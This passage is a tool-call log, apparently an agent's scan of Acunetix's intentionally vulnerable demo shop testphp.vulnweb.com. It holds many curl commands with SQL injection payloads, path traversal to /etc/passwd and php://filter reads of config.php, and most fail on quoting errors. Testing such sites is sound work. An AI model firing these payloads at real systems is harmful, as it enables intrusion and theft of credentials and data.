href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t\n\t\t\t<h2 id='pageName'>Error</h2>\n\t\t\t <div class='story'>\n\t\t\t\t<p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p>\n\t\t\t </div>\n\t\t\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:49.532610"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1\" -o /tmp/baseline.html && curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1\" -o /tmp/baseline.html && curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.292225"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1 UNION SELECT 1,2,3,4,5--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1 UNION SELECT 1,2,3,4,5--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.301441"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.306510"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.311272"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.315954"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:00.320526"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.877116"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.883881"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.889035"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.893851"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.898488"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.903100"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.907905"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1%20UNION%20SELECT%201,2,3,4,5--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1%20UNION%20SELECT%201,2,3,4,5--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.913998"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:07.920251"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:13.057013"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:13.064721"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'\" | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:13.069666"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:13.074454"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:13.079118"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:19.090514"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/artists.php?artist=1'\"'",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/artists.php?artist=1'\"'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:19.098150"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/categories.php?cat=1'\"'",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/categories.php?cat=1'\"'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:19.103184"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/listproducts.php?cat=1'\"'",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/listproducts.php?cat=1'\"'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:19.108065"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:19.112906"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:24.621442"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/artists.php?artist=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/artists.php?artist=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:24.629803"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/categories.php?cat=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/categories.php?cat=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:24.634772"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/listproducts.php?cat=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/listproducts.php?cat=1%27' | grep -i \"error\\|warning\\|mysql\\|sql\\|syntax",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:24.639530"
},
{
"tool": "curl",
"args": "-s -k 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:24.644292"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.855464"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.863553"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.868842"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.873849"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1' OR 1=1--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1' OR 1=1--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.878681"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1' UNION SELECT 1,2,3--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1' UNION SELECT 1,2,3--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.883604"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' AND 1=2 UNION SELECT 1,database(),version()--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' AND 1=2 UNION SELECT 1,database(),version()--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.888740"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:30.893750"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:35.578368"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:35.585616"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:35.590686"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:35.595552"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:35.600337"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:40.388995"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:40.396758"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1'",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:40.401750"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:40.406648"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=../config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:40.411544"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:45.359864"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:45.367638"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:45.372680"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:45.377505"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:45.382257"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:50.026973"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:50.034253"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:50.039285"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:50.044202"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=1.jpg",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:50.049003"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//listproducts.php?cat=1'\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//listproducts.php?cat=1'\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>pictures</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 